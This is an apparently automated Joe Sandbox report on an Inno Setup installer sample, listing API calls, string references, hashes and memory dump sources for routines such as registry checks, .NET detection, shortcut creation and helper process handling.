                                                                                • Opcode ID: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                                                • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                                • Opcode Fuzzy Hash: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                                                • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                                APIs
                                                                                • ShowWindow.USER32(?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000,004984F9,?,00000000), ref: 00497E23
                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000), ref: 00497E36
                                                                                • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000), ref: 00497E46
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00497E67
                                                                                • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000), ref: 00497E77
                                                                                  • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                                                Similarity
                                                                                • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                • API String ID: 2000705611-3672972446
                                                                                • Opcode ID: 082597774f549eda738f03d74d98f9d52f67cfbc56a945ed8bd031ee0c63b3f6
                                                                                • Instruction ID: d71e95358f961f9c8085103628ed7ebfe7aaf39cab9d6a0a027eda6f41515cae
                                                                                • Opcode Fuzzy Hash: 082597774f549eda738f03d74d98f9d52f67cfbc56a945ed8bd031ee0c63b3f6
                                                                                • Instruction Fuzzy Hash: C291B530A042449FDF11EBA9DC52BAE7FA4EF4A304F51447BF500AB292DA7DAC05CB59
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,0045ACF8,?,?,?,?,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045ABAA
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                • API String ID: 1452528299-3112430753
                                                                                • Opcode ID: c66920e5c30c99cf277918279cba3cc6becf5feca79c3c8df3d973bfdf2d3f66
                                                                                • Instruction ID: f5e388fb48f96f1c0466849e1c52bdf0d536658550fb6e74c3a20cf80cd44526
                                                                                • Opcode Fuzzy Hash: c66920e5c30c99cf277918279cba3cc6becf5feca79c3c8df3d973bfdf2d3f66
                                                                                • Instruction Fuzzy Hash: 2271AE707002445BDB01EB69D8427AE77A6AF48316F50856BFC01DB383CA7C9A5DC79A
                                                                                APIs
                                                                                • GetVersion.KERNEL32 ref: 0045CF3E
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CF5E
                                                                                • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CF6B
                                                                                • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CF78
                                                                                • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CF86
                                                                                  • Part of subcall function 0045CE2C: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CECB,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CEA5
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D03F
                                                                                • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D048
                                                                                Similarity
                                                                                • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                • API String ID: 59345061-4263478283
                                                                                • Opcode ID: 0692e2fed8a1faf7364eaae3f9f0a99faa4aa2306d0b5476e4b0968c8b8ae958
                                                                                • Instruction ID: 4ce31bb81caf279f5ed3d10c62bb09a2aad5f6c7ba3f26a8019cd68bbbdcec0a
                                                                                • Opcode Fuzzy Hash: 0692e2fed8a1faf7364eaae3f9f0a99faa4aa2306d0b5476e4b0968c8b8ae958
                                                                                • Instruction Fuzzy Hash: E95193B1D00608EFDB10DFA9C845BAEBBB8EF48315F14806AF915B7381C2389945CF69
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,0045688D), ref: 00456592
                                                                                • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,0045688D), ref: 004565B8
                                                                                • SysFreeString.OLEAUT32(?), ref: 00456745
                                                                                Strings
                                                                                • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566DB
                                                                                • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004566A7
                                                                                • CoCreateInstance, xrefs: 004565C3
                                                                                • IPersistFile::Save, xrefs: 00456814
                                                                                • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 0045672A
                                                                                • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 0045677C
                                                                                • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 004567B6
                                                                                • IPropertyStore::Commit, xrefs: 00456795
                                                                                Similarity
                                                                                • API ID: CreateInstance$FreeString
                                                                                • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                                                • API String ID: 308859552-3936712486
                                                                                • Opcode ID: 7d0cfd58331e70c95d7e52b395728c42337191576a3ec6130da080a3535e9fef
                                                                                • Instruction ID: c99fdec92309fd26656a6f7ea9bd91ecf5cc306c054acb75a5569a06f28a4b2e
                                                                                • Opcode Fuzzy Hash: 7d0cfd58331e70c95d7e52b395728c42337191576a3ec6130da080a3535e9fef
                                                                                • Instruction Fuzzy Hash: 29A13E71A00104AFDB50EFA9C885B9E7BF8EF09706F55406AF804E7252DB38DD48CB69
                                                                                APIs
                                                                                • 73EA4C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                                • 73EA4C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                                • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                                • 73EA6180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                                • 73E9A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                                • 73EA4C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                                • 73E9A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                                • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                Similarity
                                                                                • API ID: Object$Select$Delete$A480A570A6180Stretch
                                                                                • String ID:
                                                                                • API String ID: 1888863034-0
                                                                                • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                                • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                                APIs
                                                                                  • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472F70
                                                                                • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00473077
                                                                                • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0047308D
                                                                                • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 004730B2
                                                                                Similarity
                                                                                • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                • API String ID: 971782779-3668018701
                                                                                • Opcode ID: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                                                • Instruction ID: 1ded2309c22d90a9957aabde76cedeacc99048359e90752decbb9b8a0015ab1b
                                                                                • Opcode Fuzzy Hash: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                                                • Instruction Fuzzy Hash: 8FD12574A00149AFDB01EFA9D581BDDBBF5AF08305F50806AF804B7392D778AE45CB69
APIs
  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
• RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,?,00000000,?,00000000,00454AF9,?,0045AECE,00000003,00000000,00000000,00454B30), ref: 00454979
  • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
• RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 004549FD
• RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 00454A2C
Strings
• , xrefs: 004548EA
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548D0
• RegOpenKeyEx, xrefs: 004548FC
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454897
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: QueryValue$FormatMessageOpen
• String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
• API String ID: 2812809588-1577016196
• Opcode ID: 77e820d85456ec5b21a3348e7c864f635890ca9680278173730b6b5baa6068b5
• Instruction ID: 44bd6ba1492406805f437c97fe518088f2f8e7c1bef0b67c8a01139b77ca8c69
• Opcode Fuzzy Hash: 77e820d85456ec5b21a3348e7c864f635890ca9680278173730b6b5baa6068b5
• Instruction Fuzzy Hash: C0911471944248ABDB10DFE5D942BDEB7FCEB48309F50406BF900FB282D6789E458B69
APIs
  • Part of subcall function 004596C8: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459863
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 004598CD
  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459934
Strings
• SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00459880
• .NET Framework version %s not found, xrefs: 0045996D
• v1.1.4322, xrefs: 00459926
• v2.0.50727, xrefs: 004598BF
• SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004598E7
• v4.0.30319, xrefs: 00459855
• SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00459816
• .NET Framework not found, xrefs: 00459981
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Close$Open
• String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
• API String ID: 2976201327-446240816
• Opcode ID: a27e16b2435ffffe3ed3affd436a97f5188f93bd827438211cc6c054a476643b
• Instruction ID: 729b419896cd5506e065475e0ee5015c208a67e93f4f54458093df2d8724af3d
• Opcode Fuzzy Hash: a27e16b2435ffffe3ed3affd436a97f5188f93bd827438211cc6c054a476643b
• Instruction Fuzzy Hash: 0051A030A04145EBCB04DFA9C8A1BEE77B69B59305F54447FA841DB393D63D9E0E8B18
APIs
• CloseHandle.KERNEL32(?), ref: 00458DDF
• TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458DFB
• WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458E09
• GetExitCodeProcess.KERNEL32(?), ref: 00458E1A
• CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E61
• Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E7D
Strings
• Helper process exited, but failed to get exit code., xrefs: 00458E53
• Helper process exited., xrefs: 00458E29
• Stopping 64-bit helper process. (PID: %u), xrefs: 00458DD1
• Helper process exited with failure code: 0x%x, xrefs: 00458E47
• Helper isn't responding; killing it., xrefs: 00458DEB
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
• String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
• API String ID: 3355656108-1243109208
• Opcode ID: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
• Instruction ID: b06cb4cb11178ece3cea1db1bc2ca69ea432733d5239d7d0987fb8f0d427a68f
• Opcode Fuzzy Hash: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
• Instruction Fuzzy Hash: D9216D706047009AD720E679C44275BB6E59F08709F04CC2FB999EB293DF78E8488B2A
APIs
  • Part of subcall function 0042DDF4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 0045463B
• RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 00454777
  • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
Strings
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454583
• , xrefs: 0045459D
• RegCreateKeyEx, xrefs: 004545AF
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454553
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: CloseCreateFormatMessageQueryValue
• String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
• API String ID: 2481121983-1280779767
• Opcode ID: a579990beb4c9b51ec5b3fea0749880c5f06a70a884d2fa71269d98e88c3cf61
• Instruction ID: a200d9e45076b9aa1c9026ee470310bfc0f5ccdb1a8093a9a555fb12639cba12
• Opcode Fuzzy Hash: a579990beb4c9b51ec5b3fea0749880c5f06a70a884d2fa71269d98e88c3cf61
• Instruction Fuzzy Hash: 6C81DE75A00209AFDB00DFD5C941BDFB7F9EB49309F50442AE901FB282D7789A45CB69
APIs
  • Part of subcall function 004538A8: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
  • Part of subcall function 004538A8: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0049669D
• SetFileAttributesA.KERNEL32(00000000,00000080,00000000,004967F1), ref: 004966BE
• CreateWindowExA.USER32(00000000,STATIC,00496800,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 004966E5
• SetWindowLongA.USER32(?,000000FC,00495E78), ref: 004966F8
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC,00496800), ref: 00496728
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0049679C
• CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000), ref: 004967A8
  • Part of subcall function 00453D1C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
• 73EA5CF0.USER32(?,004967CB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC), ref: 004967BE
Strings
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
• String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
• API String ID: 170458502-2312673372
• Opcode ID: c09fb920bc7669bd65d78bc4791726942d010f86c1ff051557e4c77676e60077
• Instruction ID: 3fac7199250898b77632ea887e905273a0ca2a52c1bf25bf17bddf130f7f486a
• Opcode Fuzzy Hash: c09fb920bc7669bd65d78bc4791726942d010f86c1ff051557e4c77676e60077
• Instruction Fuzzy Hash: EE413D70A44208AFDF01EFA5DC42F9E7BB8EB09714F61457AF500F7291D6799E008BA8
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E451
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E457
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E4A5
Strings
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$=aE$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
• API String ID: 4190037839-1003587384
• Opcode ID: 71ec1778410e517379c49e62a4abf791b893e005234a700e60dfa1d7d317b6f8
• Instruction ID: 6214d84d9e891aa165dd1588e79579c1e4a82babed7fc21810c195be89e1891e
• Opcode Fuzzy Hash: 71ec1778410e517379c49e62a4abf791b893e005234a700e60dfa1d7d317b6f8
• Instruction Fuzzy Hash: 65215230B10219ABCB10EAE7DC45A9E77A8EB04318FA04877A500E7281EB7CDE41CA5C
APIs
• GetActiveWindow.USER32 ref: 00462D68
• GetModuleHandleA.KERNEL32(user32.dll), ref: 00462D7C
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462D89
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462D96
• GetWindowRect.USER32(?,00000000), ref: 00462DE2
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462E20
Strings
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
• Opcode ID: 07f038a1b45edca227de97dbc4e3a49cc5475e4390ab333f174a5f731d21d9c4
• Instruction ID: 308e9426e96dcd15a0811dc773674cbbce9379ede84ac64ebea6e7762974983c
• Opcode Fuzzy Hash: 07f038a1b45edca227de97dbc4e3a49cc5475e4390ab333f174a5f731d21d9c4
• Instruction Fuzzy Hash: 8421A775701B046FD3019A64DD41F3B3395DB94714F08453AF944EB381E6B9EC018A9A
APIs
• GetActiveWindow.USER32 ref: 0042F1A4
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1B8
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1C5
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1D2
• GetWindowRect.USER32(?,00000000), ref: 0042F21E
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F25C
Strings
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
• Opcode ID: fc179306045cef01cc7feea5ef12c7621bc9e212612d9656ab7fba5f67810d88
• Instruction ID: f96f766bc13e38d455a6b30724ea53c80225cfaaeacd9570d6dca051b777ffc7
• Opcode Fuzzy Hash: fc179306045cef01cc7feea5ef12c7621bc9e212612d9656ab7fba5f67810d88
• Instruction Fuzzy Hash: 3221D7797057149BD300D664ED81F3B33A4DB85B14F88457AF944DB381D679EC044BA9
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045915F,?,00000000,004591C2,?,?,02153858,00000000), ref: 00458FDD
                                                                                • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 0045903A
                                                                                • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 00459047
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00459093
                                                                                • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,004590F4,?,00000000), ref: 004590B9
                                                                                • GetLastError.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,004590F4,?,00000000), ref: 004590C0
                                                                                  • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
